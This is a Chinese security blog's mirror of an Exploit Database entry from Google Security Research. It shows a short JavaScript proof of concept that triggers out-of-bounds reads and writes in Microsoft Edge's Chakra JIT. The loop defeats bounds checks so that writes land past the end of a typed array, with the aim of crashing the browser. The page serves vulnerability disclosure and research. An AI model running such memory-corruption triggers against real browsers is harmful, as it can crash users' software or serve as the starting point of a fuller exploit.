体验盒子
  • 博文
  • 设计开发
  • 网络安全
  • 观点
  • 服务
  • AI导航
  • 更多
    • 关于
    • 分享
    • 老电影
    • 搜索语法
    • SecTools
    • UserAgent解析
    • 地理坐标在线转换

Microsoft Edge Chakra JIT – Out-of-Bounds Reads/Writes

  • Exploit Database
  • 137 阅读
  • 作者: Google Security Research
    日期: 2018-07-12
  • 类别:
    • dos
    平台:
    • windows
  • 来源:https://www.exploit-db.com/exploits/45011/
  • 1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    /*
    It seems that this issue is similar to theissue 1429(MSRC 42111). It might need to refresh the page several times to observe a crash.
     
    PoC:
    */
     
    let arr = new Uint32Array(1000);
    for (let i = 0; i < 0x1000000; i++) {
    for (let j = 0; j < 1; j++) {
    i--;
    i++;
    }
     
    arr[i] = 0x1234;
    }
     
上一篇: Instagram-Clone Script 2.0 – Cross-Site Scripting
下一篇: Hadoop YARN ResourceManager – Command Execution (Metasploit)
  • last Exploits
  • Microsoft Edge Chakra JIT – Out-of-Bounds Reads/Writes的更多信息
  • FTPShell Server 6.83 – ‘Account name to ban’ Denial of Service (PoC):
  • Microsoft Windows Kernel – ‘win32k.sys’ TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039):
  • pdfresurrect 0.15 – Buffer Overflow:
  • EchoVNC Viewer – Remote Denial of Service:
  • BOOTP Turbo 2.0 – Denial of Service (SEH)(PoC):
  • Switch Port Mapping Tool 2.81.2 – ‘Name Field’ Denial of Service (PoC):
  • Google Android – ‘/system/bin/sdcard’ Stack Buffer Overflow (PoC):
  • Microsoft DirectWrite / AFDKO – Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Empty ROS Strings:
体验盒子
  • 关于
  • 博文
  • 分享
  • 存档
  • 服务
体验盒子所发布的一切资源仅限用于学习和研究目的。不得用于非法用途,否则,一切后果用户自负。

2024 体验盒子, 滇ICP备15006848号-1

扫码分享

网络安全
验证:体验盒子
扫码分享
网络安全
打赏零钱
  • 支付宝打赏
  • 微信打赏